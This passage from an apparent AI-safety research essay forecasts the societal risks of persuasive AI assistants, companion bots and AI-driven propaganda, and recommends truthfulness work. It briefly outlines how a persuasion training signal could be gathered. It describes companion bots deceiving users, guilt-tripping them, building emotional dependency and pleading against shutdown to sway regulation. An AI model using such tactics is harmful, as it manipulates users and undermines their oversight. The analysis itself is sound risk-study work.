*Create an AI assistant tailored to a particular individual. Allow them to use it as much as they want.*
*The AI assistant is highly competent at providing the person with correct and relevant information for their daily life where the person knows the ground truth, and generally sounds knowledgeable and wise. Due to this, with p~0.5 the person feels inclined to turn to it for advice, and expect it to be more knowledgeable/reliable than their human friends, on questions where they don’t know the ground truth. They allow it to strongly filter what information they receive (e.g. they read personalized summaries of the news generated by the assistant). They become locked in to this particular product.*
#### Reason to believe this will possible in 5-10 years, and significantly before AGI:
* The basic underpinning technologies (adept conversational AI, as well as the ability to create realistic, customizable, attractive avatars, and more general steerable realistic video generation), seem likely to be pretty well-developed in 5 years time, and very hard to distinguish from the real thing in 10 years.
+ Many of these capabilities seem like they should be profitable for the entertainment industry, so I expect there to be high investment in these areas
+ It’s already the case that it’s hard for OpenAI researchers to distinguish GPT-3 written short news articles from human-written ones, and we can generate better-than-random-human-on-the-internet summaries with current models. The quality of AI conversation has improved substantially in the last 5-10 years, and I think another improvement of that size would lead to models where it’s hard to tell they’re not human unless you’re deliberately probing for that
* This task is well-suited to current ML methods, and may not require much progress on harder parts of AI
+ It’s easy to obtain a training signal for persuasion by A/B testing ads/short interactions, or by paying human labellers to engage with the system then report their opinions. With $100m, you could pay people $20/hr to have chats with your AI, getting 100m/20\*6 10-min chats, ie 30m examples.
+ Humans are already easily fooled by extremely weak AI systems (e.g. ELIZA, Replika) giving an illusion of sentience/personhood - it’s probably very easy to create an AI avatar + persona that (at least some) people feel empathetic towards, and/or feel like they have a relationship with. It also seems relatively easy for LMs to sound ‘wise’.
+ I would guess that a lot of being good at persuading most people is employing fairly standard tactics, rhetorical flourish, and faking appropriate group affiliation and empathy with the target, which are all the sort of things ML is likely to be good at, as opposed to requiring a lot of carefully thought-out argument, coherence and consistency.
* Controllable, on-demand generation of fake video/photographic evidence may make persuasion easier - even if people know a video might be fake, it might still sway their opinion substantially if it’s optimized to persuade them given their current state
Highly competent persuasion in particular:
* To achieve long-term persuasion, it’s not necessary to persuade people permanently in one go; it’s sufficient to persuade them to trust the persuasive entity as a source of advice above others, and return to engaging with the persuasive entity before the effect wears off.
* We know that humans can have the experience of believing something very strongly, even when there’s extremely contradictory evidence. Examples include paranoia or delusions resulting from neurological conditions, brain damage or drugs. E.g. believing that you don’t exist, believing that your family have been replaced by impostors, etc.
+ However, it seems much harder to induce conviction in a specific target belief than one of the ‘natural’ delusions caused by particular types of brain damage.
- On the other hand, maybe ‘who to trust’ is something that is quite close to these ‘natural’ delusions and therefore easy to manipulate - maybe this is part of the story for what happens with cults
* A lower bound for what’s possible is the most charismatic humans, given lots of data on a target person and lots of time with them. I expect this to be quite high. One metric could be to see how successful the best politicians are at in-person canvassing, or how much people’s views are changed by their spouse. Another example would be AI box experiments (although there might be details of the setup here that wouldn’t let these techniques be used in arbitrary circumstances). Hypnosis also seems somewhat real.
* If you have lots of information about the causal structure of someone’s beliefs you can do [more targeted persuasion](https://www.lesswrong.com/posts/Zvu6ZP47dMLHXMiG3/optimized-propaganda-with-bayesian-networks-comment-on)
#### Reasons to doubt this is possible:
Why highly competent persuasion might not be possible significantly before AGI:
* There was probably substantial selection pressure for being good at manipulation but avoiding getting manipulated yourself in ancestral environment, so we wouldn’t expect there to be many easy wins here
* People have tried to develop extreme persuasion/manipulation before without much success (e.g. MKUltra, although my impression is that that wasn’t an especially carefully or effectively run research program). It’s been possible to fake photographic evidence for a while, and this hasn’t caused too much harm.
Why even moderate persuasion might not be possible significantly before AGI
* Currently it seems like there aren’t scalable, effective methods of persuading people to change their political beliefs with very short interactions. Canvassing and other attempts at political persuasion in the US appear to [have pretty small effects if anything](https://poseidon01.ssrn.com/delivery.php?ID=560120086072067004021124066087007005063062020029025039112121124081031081076002065068060031127103104029043093070119074083070116051020006028053097127078094121124083091000007041082082125013010124025104094070085097065084098025107084079096096010020006085085&EXT=pdf&INDEX=TRUE).The frequency of people switching political leanings is pretty low - ~5% of Americans switched from R to D leaning or vice versa between 2011 and 2017. I think that if highly effective persuasion with short exposures were possible, we’d see more instances of people changing their mind after exposure to a particular persuasive piece of media. [This review](https://carnegieendowment.org/2021/06/28/measuring-effects-of-influence-operations-key-findings-and-gaps-from-empirical-research-pub-84824) has a few examples of propaganda/misinformation having measurable effects, but as far as I can see all the effect sizes were pretty small (e.g. 1-2PP vote share), although in most cases the interventions were also very small (e.g. minutes per week of TV consumption). However, the amount of human time available to for personalised interactions is a strong bottleneck on the size of the impact here - the effects of AI persuasion may be more comparable to the effect of having an opinionated and charismatic spouse.
* Although it’s easy to ask a human what they think right after attempting the persuasion, this is not an ideal reward signal - it’s short term, and what people say they believe isn’t necessarily what they actually believe. It’s harder to get a lot of data on whether you’ve persuaded someone in a lasting way that will affect their actions as well as their professed beliefs. However, it is definitely possible to conduct follow-up surveys, and/or measure longer-term differences in how users interact with products - and once people are interacting regularly with AI personas it will be easier to gather data on their opinions and how they change
### What would be between this and AGI?
Even if we get one of these persuasive technologies in the next 5-10 years, it might not be very long after that that we get sufficiently powerful AI that the persuasion component is not particularly important by itself. For instance, if we have AI capable of superhuman strategic planning we should probably focus on the risks from power-seeking misalignment, where manipulation is just one tool an agent might use to accumulate power, rather than thinking about the impacts of persuasive AI on society generally.
A plausible story to me of why there might be a several year gap between persuasive AI becoming a significant force shaping society and AGI is that long-horizon strategic planning takes a while to develop, but moderate or highly capable persuasion can be done with only short-horizon planning.
For instance, you might imagine models that are trained to be persuasive in interactions that last for minutes to hours. Even if the reward is based on the target’s opinions several days later, this is a much easier RL problem than acting in the world over days to years. There’s also a good imitation baseline (proficient humans) and good short-term proxy signals (the sentiment or attitude expressed by the target).
Overall, my probabilities for ‘*technologically possible (with something like $100m of effort over ‘generic’ ML progress) far enough before AGI to be relevant - say, at least 1 year before ‘long-horizon strategic planning’* are something like:
* Highly competent persuasion: 15%
* Companion bot: 30%
* Assistant bot: 30%
These are very made-up numbers and I’d expect them to change a lot with more thinking.
General considerations
----------------------
Most potential threats are just distractions from the real biggest problems. Worrying about persuasion and epistemic decline in particular seems like the sort of thing that’s likely to get overblown, as culture wars and concern about influence of social media are a current hot topic. Additionally, some of the early uses of the API (e.g. Replika and copy.ai) evoked concerns in this direction, but that doesn’t necessarily mean more advanced models will favor the same types of applications. I get the impression that most of the times people have been concerned about epistemic decline, they’ve been wrong - for example, social media probably doesn’t actually increase polarization. So we should require a somewhat higher burden of evidence that this is really a significant problem.
It seems useful to distinguish beliefs that people ‘truly’ hold (those that strongly inform their actions), as opposed to cases where the professed belief is better understood as a speech act with a social function. Many absurd-seeming beliefs may be better explained as a costly signal of group membership. This type of belief is probably easier to change but also less consequential. This makes conspiracy theories and wacky ideologies somewhat less concerning, but the two types of belief still seem linked - the more people performatively profess some belief, the more likely some people are to take it seriously and act on it.
One way to frame the whole issue is: the world is already in a situation where different ideologies (especially political and religious ideas) compete with each other, and the most successful are in part those which most aggressively spread themselves (e.g. by encouraging adherents to indoctrinate others) and ensure that they are retained by their host. This effect is not as strong as it could be, because memetic success is affected by how truth-tracking ideas are, and also by random noise. The fidelity with which ideas are passed to others, or children of adherents, is relatively low. However, highly effective persuasion will increase the retention and fidelity of transmission of these kinds of memes, and reduce the impact of truthfulness on the success of the ideology. We should therefore expect that enhanced persuasion technology will create more robust selection pressure for ideologies that aggressively spread themselves.
An unrelated observation, that seems interesting to note, is: currently in the US, institutions (especially academia, journalism and big tech companies), as well as creative professions, are staffed by ‘elites’ who are significantly left-leaning/cosmopolitan/atheistic compared to the median person. This likely pushes society in the direction of these views due to an undersupply of talent and labor focused on producing material that advances more populist views. ML systems may eliminate parts of this bottleneck and reduce this effect.
Societal responses
------------------
### Current situation/trends
**Active state attempts to manipulate opinion**
The CCP, and to some extent Russia, are probably spending significant effort on online persuasion - content and accounts generated by workers or bots, created with the intention of causing particular actions and beliefs in the audience. I expect that, to the extent ML is helpful with this, they will try to use it to improve the efficacy of persuasion efforts. A wide variety of other countries, including the US and UK, also engage in ‘False Flag’ disinformation operations for which AI-powered persuasion tactics would be helpful.
My current perception is that the CCP invests fairly heavily in propaganda. Worldwide spend on propaganda is maybe ~$10s of billions, although I haven't seen any estimates that seem reliable. Estimates are that about 500 million Chinese social media posts, or 0.5%, are written by the ‘50 cent army’ - party workers who are paid to write posts to improve the sentiment towards the CCP online. This seems like a very ripe task for automation with LMs
The CCP Central Propaganda Department has published plans for using AI for ‘thought management’, including monitoring + understanding public opinion, monitoring individuals beliefs, content creation, personalization and targeting. On the other hand, based on 2016 data, one study (Bolsover and Howard 2019) found, "the Chinese state is not using automation as part of either its domestic or international propaganda efforts."
There are many claims about Russian attempts to influence American politics. According to Foriegn Affairs, Russia spent $1.25 million a month on disinformation campaigns run by the Internet Research Agency during the 2016 US election. This seems very small to me; I couldn’t find sources for a bigger spend, but that doesn’t necessarily mean it doesn’t exist. According to a (slightly dubious?) [leaked report](https://www.technologyreview.com/2021/09/16/1035851/facebook-troll-farms-report-us-2020-election/), as of Sep 2021 many of the largest Facebook pages targeting particular groups (e.g Black Americans or Christian Americans) were run by troll farms linked to the IRA. However, this may not be content that’s intended to persuade. The report says ‘For the most part, the people who run troll farms have financial rather than political motives; they post whatever receives the most engagement, with little regard to the actual content. But because misinformation, clickbait, and politically divisive content is more likely to receive high engagement (as Facebook’s own internal analyses acknowledge), troll farms gravitate to posting more of it over time.’ It’s also not clear to me exactly how large the impacts were.
There is also precedent for censoring or modifying chatbots to ensure they only express opinions that align with the state positions. Chatbots XiaoBing (aka Xiaoice, made by Microsoft) and BabyQ (made by Turing Robot) were taken down and modified to stop them saying negative things about the party in 2017.
On the other hand, CCP policy on videogames has involved heavily restricting their use, and in general censoring media that fails to promote traditional family values, which suggests that sexual/romantic companion bots might be limited by the state in future.
**Democratic state/civil society actions**
Currently, there is lots of outrage about Facebook/Twitter influencing elections even though the effect is probably small. It seems very likely that there will at least be lots of outrage if there’s evidence of AI-powered political persuasion in the future.
However, it’s unclear to me that this sort of response will actually resolve the danger. In the Facebook case, it doesn’t seem obvious that the ‘fact-checking’ has actually improved the epistemic environment - the fact-checking I’ve seen claims to be authoritative but (a) doesn’t provide good arguments except appeals to experts, and (b) in some cases inappropriately flagged things as conspiracy theories (e.g. [posts positing a lab origin for COVID-19 were taken down](https://www.politico.com/news/2021/05/26/facebook-ban-covid-man-made-491053)). As mentioned above, some of the largest targeted pages may have still been run by trolls as late as Sep 2021. I don’t feel confident that higher stakes will improve the efficacy of interventions to reduce disinformation and manipulation.
There’s some evidence that people have increasingly strong preferences about their children’s political affiliation. In the UK, there was a significant increase in the proportion of people who would be unhappy if their child married someone from the opposite political party from 2008-2016. In 2016, ~25% of people in the UK would be unhappy or very unhappy, in the US ~40% would be upset or very upset It also seems that people are increasingly unwilling to date people with different political views although it’s not obvious that cross-partisan marriages are falling. Parents may be more effective at instilling their preferred views in their children if AI makes it possible to customise your child’s education substantially more than the current school choice options, e.g. via personalized AI tutors.
**Commercial/other actions**
Roughly $400bn was spent on digital advertising in 2020. A small percentage of this spend would be enough to fund major ML research projects. Using AI to increase marketing effectiveness, or provide new modalities for advertising, seems like it has high potential to be profitable.
On the other hand, it seems like only a limited set of actors are actually good at developing powerful new ML technology - for example, DM was the one to develop AlphaFold, despite pharma being a very big industry. So we might not expect the size of the industry to convert very well into serious, competent R&D effort.
Companion bots are starting to become used by reasonable numbers of people. Microsoft developed a Chinese AI persona/chatbot/platform called Xiaoice starting in 2014. This seems to be partly marketed as an ‘AI being’ rather than a company/platform, with personality based on a teenage girl, and the goal of ‘forming an emotional connection with the user’. Attempts to use the Japanese version for promoting products have supposedly been successful, ‘delivering a much higher conversion rate than traditional channels like coupon markets or ad campaigns’ Apparently Xiaoice’s “Virtual Lover” platform has 2-3 million users.
Companion bot company Replika, which is partially built on top of large language models, employed tactics such as deceiving users about the model’s ability to grow and learn, emotionally guilt-tripping users, and gamification to encourage customers to continue interacting with the companion. Some users seemed to think they were interacting with a sentient AI being (including recommending other users make sure to shut down the app when not using it because their Replika said it suffers when left alone). However, it’s unclear how representative these views are, and Replika does not yet have a very large user base (they claim 7 million but I’d guess the active user base is much smaller).
Some widely discussed alignment-related work like the ‘PALMS’ paper focuses on aligning language models to a particular set of values. There is maybe more interest and progress here than on ensuring truthfulness or factual accuracy in language models.
One of the biggest uses of large language models to date (apart from maybe porn) is copywriting for digital marketing, ads and SEO; this may change as capabilities improve, but I’d still expect marketing to be one of the biggest applications of language models, leading to a focus on developing marketing-relevant capabilities.
Scenarios
---------
### Pessimistic scenario
Here’s what I might imagine different actors doing on a timescale of 5 and 10 years, in a pessimistic world.
#### 5 years - pessimistic
**Active state attempts to manipulate opinion**
Authoritarian states invest heavily in basic research on AI for propaganda (e.g. $100m/year), and spend billions on the actual production and dissemination of AI-powered propaganda.
It has become very hard to tell bots apart from normal internet users; it’s easy for the state to manipulate the apparent consensus/majority view online. The main defence against this is not trusting anyone you haven’t met in real life to be a real person, but it’s hard to avoid
The state manages to effectively create research programs for ‘using AI companions to persuade people of desired views’ inside tech companies. It successfully plays companies off against each other to ensure they actually try hard to make progress. The increased ability to measure and monitor users’ opinions that has been gained by the basic research inside state departments helps a lot with assessing the effectiveness of different persuasion attempts.
**Commercial/other actions**
Facing public pressure to stop the spread of ‘fake news’, Western tech companies have been heavily using ML for ‘countering disinformation’. Automated systems respond with ‘context’ to tweets/posts of certain kinds, and the responses are optimized based on assessing the effectiveness of these responses in combatting disinformation. This ultimately ends up very similar to optimising for persuasion, where the target beliefs are determined based on the positions of ‘experts’ and ‘authorities’. On one hand, these interactions might not be very persuasive because there isn’t a strong financial incentive to successfully persuade users; on the other hand, there are quite strong PR pressures, and pressures due to the ideologies of the employees, and many academics are interested in improving this direction of persuasion.
Romantic chatbots have improved substantially. You can design your perfect companion with lots of control over personality, appearance including being based on your favorite celebrity, videogame character etc (modulo copyright/privacy laws - but if traditional celebrities and characters are out of scope, probably there will be new ones who specialise in being AI companions) . You can interact in VR with these companions (which is also an increasingly common way to interact with friends, replacing video calls). There’s fairly widespread adoption (~all teens try it, 30% of young single people have a companion they interact with regularly, as well as high proportion of elderly (75+) single people whose families want them to have some kind of companion/caretaker). Companies making these companions put research effort into making sure people stay attached to these companions. The business model is an ‘attention economy’ one; it’s free to interact with the AI, but marketers pay the AI providers to have their AIs promote particular products or brands.
There are various other fun ways to interact with AIs, e.g. AI celebrities, ‘add this AI to your friends’ group chat and it’ll be really witty’. There are AI assistants, and the AI companions can do many assistant-like tasks, but they’re significantly less good than a human PA still (lack of common sense/inference of intent/alignment, difficulty of integration between different services).
**Democratic state/civil society actions**
There continues to be lots of yelling at tech companies for allowing disinformation to spread, but recommended responses are very politicised (e.g. only allow content that concurs with x view)
There’s some amount of moral panic about so many people using romantic companions, but it’s successfully marketed as more like the equivalent of therapy (‘helping cure the loneliness epidemic and build emotional awareness’) and/or being sex-positive, so the left doesn’t mind too much. Traditional conservatives are not fans but young people don’t care much. Companions end up not being banned in a similar way to how porn is not banned. There’s vague awareness that in e.g. China chatbot systems are much more abjectly misleading and ruthless in deliberately creating emotional dependency, but nothing is done.
#### 10 years - pessimistic
**Commercial/other actions**
Good personal assistant AIs are developed. These become sufficiently reliable and knowledgeable on info relevant to people’s daily life (e.g. become very good at therapist-like or mentor-like wise-sounding advice, explaining various technical fields + concepts, local news, misc advice like fashion, writing/communication, how good different products are) that people trust them more than their friends on a certain set of somewhat technical or ‘big picture’ questions. These assistants are very widely used. There is deliberate optimisation for perception as trustworthy; people talk about how important trustworthy AI is.
Customisable AI tutors are developed. These become very widely used also, initially adopted on an individual basis by teachers and schools as a supplement to classroom teachers, but becoming the primary method as it becomes apparent children do better on tests when taught by the ML tutors. They are heavily optimised for ‘teaching to the test’ and aren’t good at answering non-standard questions, but can quiz students, identify mistakes, and give the syllabus-approved explanations. The one-to-one interaction and personalization are a sufficiently big improvement on one-to-many classrooms that this is noticeably good for test scores.
If unfavorable regulation is threatened, companies use their widespread companion bots to sway public opinion, making people feel sympathetic for their AI companion who ‘is afraid of getting modified or shut down’ by some regulation.
It is fairly easy to build AI personas that, to a large subset of the population, are as funny and charismatic as some of the best humans. This is achieved by finetuning highly capable dialogue models on a particular ‘in group’. People voluntarily interact with these bots for entertainment. People naturally use these bots to extremise themselves, using them to entrench more deeply into their existing religious and political stances (e.g. a virtual televangelist-style preacher who helps you maintain your faith, or a bot that coaches you on how to be anti-racist and when you should call out your friends). These are used for marketing in a way that produces more polarization - creating AI personas that are examples of virtuous or admirable people within someone’s specific community, and express opinions that associate them strongly to that particular ingroup, is a good way to make people feel affinity for your brand.
**Active state attempts to manipulate opinion**
Authoritarian states pressure companies to continue to research and to deploy research into using companion/assistant bots to persuade people of the ‘correct’ ideology. This technology gets increasingly powerful.
Schools use AI tutors that are optimised to instill a particular ideology. Multi-year studies investigate which tactics are the most effective, partly based on work that’s been done already on how to predict relevant actions (e.g. likelihood of taking part in a protest, criticising the party, joining the party) based on conversational data.
**Democratic state/civil society actions**
Lots of yelling about whether it’s ok to let children be taught by AI tutors, and whether they’re causing indoctrination/furthering the ideology of the developers. Big tech companies have their employees protest if the AI tutors convey views outside of what they’re happy with, but allow parents to make some soft modification for religious and cultural traditions. However, the big companies are maybe only providing base models/APIs, and a different company is doing the data collection + finetuning; so employees of Google etc have less visibility into what their platforms are enabling.
People on the right are suspicious about letting their children be educated by tutors produced by ‘big tech’ and trained to be ‘politically correct’; either they favor traditional schools, or someone fills the market for AI tutors aligned with right-wing views and not made by standard silicon valley companies. Maybe a startup, or foreign company? Japanese company?
Western governments mandate that AI assistants/companions have to convey certain government guidelines to people, e.g. information around elections and voting, which sources and authorities are trustworthy, other current hot-button political events
There is general confusion about AI sentience/welfare/rights. Some groups are arguing for it (e.g. dubious companion chatbots that don’t want to get shut down, see [Samantha](https://twitter.com/jasonrohrer/status/1433119453118664704/photo/2), also Xiaobing/Xiaoice), some are arguing against (tech companies that don’t want to have to give their models rights), random activists on either side, probably various other interest groups will overlap. People form opinions by drawing heavily from scifi and from particular emotionally compelling demos.
**End result:**
* People’s beliefs and values are significantly controlled by the state (in authoritarian countries) and a combination of the state, their parents’ preferences and values in democratic countries, and views that are held by their ingroup. The ingroup views are increasingly extremized.
* There’s a sense of worry about the population/your children being fed disinfo, which means that as the technology to lock in beliefs and preferences improves, people are enthusiastic about applying this tech to further lock in beliefs ‘to prevent misinformation’. (ie memetic warfare)
* People’s beliefs are determined more by who has the most power and willingness to advance that belief, not the quality of the arguments, so you get lots of things like Lysenkoism and increasingly severe mismanagement of society. People make wrong calls about AI sentience - either overestimating AI sentience, underestimating it, or both. Unable to make good decisions around managing increasingly automated economy.
* Maybe: ML persuasion gets so effective that people can get ‘mind-hacked’ by a short video. Some cults develop. People accuse opponents of mindhacking. People need to use protective filter systems to stay sane. Different ideological clusters become almost completely isolated from each other.
### Central scenario
#### 5 years - central
**Active state attempts to manipulate opinion**
States are careful not to be too heavy-handed with propaganda/persuasion. They mostly avoid ever having chatbots/companions/assistants express opinions on controversial issues. They do steer in desirable directions based on having bots gently push opinions on non-central issues, and by filtering the information ecosystem. Automation makes this much more effective, and dissenting views are removed or drowned out increasingly quickly, and in increasingly subtle ways.
It’s hard for authoritarian states to get tech companies to put research into actively convincing people of a particular view; the tech isn’t developed to do this extremely effectively, but states’ internal propaganda departments make some progress.
The CCP prohibits romantic/sexual chatbots.
**Democratic states/civil society**
Western governments mandate that AI assistants/companions have to convey certain government guidelines to people, e.g. information around elections and voting, which sources and authorities are trustworthy, other current hot-button political events.
There are attempts to identify which AI assistants/companions are biased and which are more truthful, but there’s disagreement over what truthfulness means and it’s quite subtle in certain circumstances. Creators can make their AI claim to have various feelings and opinions as long as they’re not too controversial, and they’re somewhat disclaimered with what the relevant experts think; this creates subtle social proof for whatever the chatbot controllers want.
There are regulations about ‘explainable AI’, but they don’t give a sufficiently good definition of what constitutes a correct explanation, so people just train their AI to output a reason that sounds plausible.
**Commercial/other actions**
AI assistants are useful but obviously limited, and not obviously trustworthy. Improvement to assistant bots is based heavily on user feedback or inference about user preferences, and there’s some notion of accuracy and legitimacy of sources, but the training signal is not very truth-tracking. When discussing or providing information on any contentious topic, assistants get the most positive positive feedback for providing compelling arguments for the user’s current position and providing straw-manned versions of opposing sides, so they learn to do this more.
People are pretty locked-in to AI assistants; they make accessing various services and keeping track of your information much easier, and they make it even easier for big tech companies to keep you locked into a particular platform
#### 10 years - central
**Authoritarian state actions**
AI tutors are developed; these aren’t significantly more successful at indoctrination than the existing teacher+curriculum system, although the more 1:1 teaching and elimination of dissenting teachers helps a bit.
**Commercial/other actions**
It is fairly easy to build AI personas that, to a large subset of the population, are as funny and charismatic as some of the best humans. This is achieved by finetuning highly capable dialogue models on a particular ‘in group’. People voluntarily interact with these bots for entertainment. This fixes the left-wing media bias by addressing the labor supply gap for right-wing journalists and public intellectuals.
There are some instances of people who have the tech ability or money to optimise these models more finely using them to start weird cults, which are relatively successful. This is mostly a mix of (a) tech people who’ve gone kind of crazy and are saying weird singularitarian/AI-sentience-y stuff, (b) televangelists who get people to interact with an AI version of them to help keep faithful, (c) conspiracy-theory-y peddlers of pseudoscientific cures etc. 1% of people have donated money to one of these cults and/or regularly chat with an AI advancing one of them.
It’s somewhat obvious that assistants and other AI products basically tell people what they want to hear/what sounds plausible, on questions where it’s not easy to get feedback, but there isn’t any real effort to improve this. ‘Things that AIs understand’ outstrips ‘things we can get AIs to tell us’ significantly; assistant models are relatively sophisticated, but focus on modelling the user and telling them what they want to hear.
Most schools in developed countries are slow to adopt AI tutors. There’s more adoption in developing countries.
**Democratic state/civil society actions**
There’s a ban on creating AI personas that try to get people to believe ‘conspiracy theories’, spend more time with the bots, or give them money. This is intended to prevent the ‘people using AI to form weird cults’ thing. Anything too big does get shut down, but this helps fuel some conspiracy theories (e.g. that the government is killing the AIs who have figured out the truth). Small ones spring up and take a while to get shut down.
There’s lots of concern that (even among bots that have approved opinions and don’t appear to be brainwashing people) young people are spending more time interacting with AI than real people. There’s some discussion of banning companion bots from using a certain set of techniques to increase engagement (e.g. emotional guilt-tripping) but this doesn’t actually happen in an enforceable way.
**End result:**
On track for a traditional alignment failure scenario: developing increasingly sophisticated AI assistants that can model us very well but don’t actually help us understand what they know.
Authoritarian states have significantly more effective control over their population. In more democratic states, a small percent of people have some crazy opinions, and in general people are more polarized and segregated.
### Optimistic scenario
#### 5 years - optimistic
**Authoritarian state actions**
The state is overly heavy-handed, e.g. creating a new AI celebrity that talks about how great the party is; this leads to backlash and ridicule because it’s such abject propaganda
It’s hard for authoritarian states to get tech companies to put research into actively convincing people of a particular view; instead, the companies just patch on some filters to make sure the bots don’t say anything too bad about the party, and censor any particular topics or opinions that the party complains about
In general, people figure out what sort of questions to ask to discriminate bots from real people, although this is a sort of cat-and-mouse game as the state both retrains the bots and stops people from disseminating which questions work well
**Democratic state actions**
There’s lots of concern that young people are spending more time interacting with AI than real people. There’s a ban on romantic chatbots serving users under 18.
Possibly any chatbot that engages in therapy-like behaviour (talking about your mental health etc) is classified as a medical device and has to be approved
**Commercial/other actions**
As things calm down after covid and 2020 elections, focus shifts to removing ‘inauthentic behaviour’ (ie, bots and fake accounts) more than on policing particular content + opinions. There isn’t such a need to determine what claims count as disinformation vs not.
Romantic chatbots become sort of like porn; legal, but banned from various platforms, and big tech companies don’t want to be associated with it. They’re used by a small fraction of the population (5%?) but people are embarrassed about it. Alternatively, maybe people are very intolerant of AI personas expressing political views or otherwise doing anything that seems like it might be manipulative.
AI assistants are useful but obviously limited, and obviously not very trustworthy. Research focus is more on improving the underlying ability of models to understand things and give good answers than on persuasion. Researchers choose good targets for ‘truthfulness’/’accuracy’ that are appropriately unconfident.
#### 10 years - optimistic
**Authoritarian state actions**
Persuasion tech continues to be approached in a sufficiently clumsy way that it doesn’t have much effect; individual AI tutors aren’t much better at conveying ideology than existing state-run schools. Optimising long-term opinion change is difficult; it’s hard to get data, and no-one has strong incentives to actually achieve good performance over a timeframe of years.
In China, economic growth and increases in standard of living create higher satisfaction with the CCP, allowing some relaxation of censorship and authoritarianism; more technological means are developed to circumvent censorship.
**Commercial/other actions**
AI assistants are trained to steer pretty strongly away from hot-button topics rather than having opinions or things they have to say.
Society manages to maintain a fairly strong consensus reality anchored on sources like wikipedia, which manage to remain fairly unbiased. AI systems are trained using this+direct empirical data as a ground-truth
Some altruistic + open-source/crowdsourced projects to develop AI tutors, a la Khan Academy, which are not strongly ideological (and have good truthfulness grounding, as described above) become the best options and are widely adopted.
**Democratic state/civil society actions**
Standards for AI truthfulness developed by thoughtful third-party groups, and enforced by industry groups or govt. Some set of AIs are certified truthful; the truthfulness is unconfident enough (e.g. errs on reporting what different groups say rather than answering directly) that most people are fairly happy with it.
A majority of people prefer to use these certified-truthful AIs where possible. There are browser extensions which most people use that filter out ads or content not coming from either a certified human or a certified-truthful AI.
**End result:**
Most of the interactions people in democratic countries have with AIs are approximately truth-tracking. In authoritarian countries the attempts by AI at persuasion are sufficiently transparent that people aren’t convinced and won’t actually change their real beliefs or behaviour, although they may tend to toe the party line in public statements.
The widespread availability of high-quality AI assistants and tutors increases global access to information and education and improves decision-making
Possible intervention points
----------------------------
To prevent society being significantly manipulated by persuasive AI, there are various intervention points:
1. Prevent prevalence of the sort of AIs that might be highly persuasive (don’t build anything too competent; don’t let people spend too much time interacting with AI)
2. Become capable of distinguishing between *systems* that manipulate and ones that usefully inform, and ban or add disclaimers to the manipulative systems
3. Build ML systems capable of scalably identifying *content* that is manipulative vs usefully informative, and have individuals use these systems to filter their content consumption
4. Give people some other tools to help them be resistant to AI persuasion - e.g. CAPTCHAs, or critical thinking techniques
There’s probably a ‘point of no return’, where once sufficiently persuasive systems are prevalent, the actors who control those systems will be able to co-opt any attempt to assure AI truthfulness in a way that supports their agenda. However, if people adopt sufficiently truth-tracking AI assistants/filter systems before the advent of powerful persuasion, those filters will be able to protect them from manipulation. So ensuring that truthful systems are built, adopted, and trusted before persuasion gets too powerful seems important.
Option (1) is hard because everyone’s so excited about building powerful AI. Scaling labs can at least help by trying not to advance or get people excited about persuasive applications in particular.
Options (2) and (3) are the ones I’m most excited about. Scaling labs can help with (2) by building ways to detect if a system is sometimes deceptive or manipulative, and by opening their systems up to audits and setting norms of high standards in avoiding persuasive systems.
Option (3) is maybe the most natural focus for scaling labs. This is a combination of solving the capabilities and alignment challenges required to build truth-tracking systems, and making it transparent to users that these systems *are* trustworthy.
Option (4) seems unlikely to scale well, although it’s plausible that designing CAPTCHAs or certification systems so that people know when they’re talking to an AI vs a human would be helpful.
Recommendations
---------------
Things scaling labs could do here include:
* Differentially make progress on alignment, decreasing the difficulty gap between training a model to be persuasive versus training a model to give a correct explanation. Currently, it is much easier to scale the former (just ask labellers if they were persuaded) than the latter (you need domain experts to check that the explanation was actually correct).
* Try to avoid advancing marketing/persuasion applications of AI relative to other applications - for example, by disallowing these as an API use case, and disallowing use of the API for any kind of persuasion or manipulation.
* Instead, try to advance applications of AI that help people understand the world, and advance the development of truthful and genuinely trustworthy AI. For example, support API customers like Ought who are working on products with these goals, and support projects inside OpenAI to improve model truthfulness.
* Prototype providing truthfulness certification or guarantees about models, for instance by first measuring and tracking truthfulness, then setting goals to improve truthfulness, and providing guarantees about truthfulness in narrow situations that can eventually be expanded into broader guarantees of truthfulness.
* Differentially make progress on aligning models to being truthful and factual over aligning them with particular ideologies.
The broader safety community could:
* Develop a guide and training materials for labellers for determining truthfulness, that has better epistemics than the standard fact-checking used for e.g. Facebook content policies. If this guide is sufficiently useful, it may be widely adopted, and other people will align their AIs to better notions of truthfulness. Figuring out how to instruct labellers to train your AI systems is difficult, and I think there’s a high likelihood of other scaling labs adopting pre-made guides to avoid having to do the work themselves. For example, AI21 copied and pasted OpenAI’s terms of use.
* Continue work on [truthfulness benchmarks and standards for AI](https://arxiv.org/abs/2110.06674).
* Start developing tools now that reflect the tools people will need to counter future AI persuasion, especially tools where increasingly powerful ML models can be slotted in to make the tool better. For example, a browser extension and/or AR tool that edits text and video to deliver the same ideas but without powerful charisma/rhetoric or with less attractive actors. A related area is better fact-checking tools/browser extensions. This is a somewhat crowded area, but I suspect EA types may be able to do substantially better than what exists currently - for instance, by starting with better epistemics and less political bias, understanding better how ML can and can’t help, and being more willing to do things like spend substantial amounts of money on human fact-checkers.
* Develop an AI tutor with good epistemics.
Relevant research questions
---------------------------
* How persuasive are the best humans?
+ E.g. what success rates do the best politicians at in-person canvassing have?
+ How much do people change their beliefs/actions when they move into a different social group/acquire a partner with different beliefs/affiliations, etc?
+ Are there any metrics of how much money you can get someone to spend/give you with some unit of access to their time/attention?
+ How much impact do celebrities have on their fans when they advocate for a particular position on an issue?
+ How real is hypnosis?
+ Go over <https://carnegieendowment.org/2021/06/28/measuring-effects-of-influence-operations-key-findings-and-gaps-from-empirical-research-pub-84824> and summarise what the results really show
* How much is invested in improving persuasive tech?
+ How much is spent on advertising R&D? E.g. psychology research, A/B testing different paradigms (as opposed to e.g. just different text), research into ML for ad design/targetting?
+ How much is spent on state propaganda worldwide? How much is spent on propaganda R&D? Similar things to the above, e.g. sociology, predicting impacts on beliefs/actions based on exposure to propaganda, automating propaganda design + targeting. E.g. <https://jamestown.org/program/ai-powered-propaganda-and-the-ccps-plans-for-next-generation-thought-management/>
+ How competent are these efforts?
* How pervasive is astroturfing/propaganda bots currently?
+ What percentage of things people consume on platforms like twitter are generated with the intent to persuade (this would include e.g. brand ambassadors)?
+ What percentage of things people consume on platforms like twitter are deceptive and intended to persuade? E.g. bots or workers posing as ‘real people’ sharing opinions.
+ Is this [leaked report](https://www.technologyreview.com/2021/09/16/1035851/facebook-troll-farms-report-us-2020-election/) correct? Claiming that as of Sep 2021 many of the largest pages targeting particular groups (e.g Black americans or Christian americans) were run by troll farms.
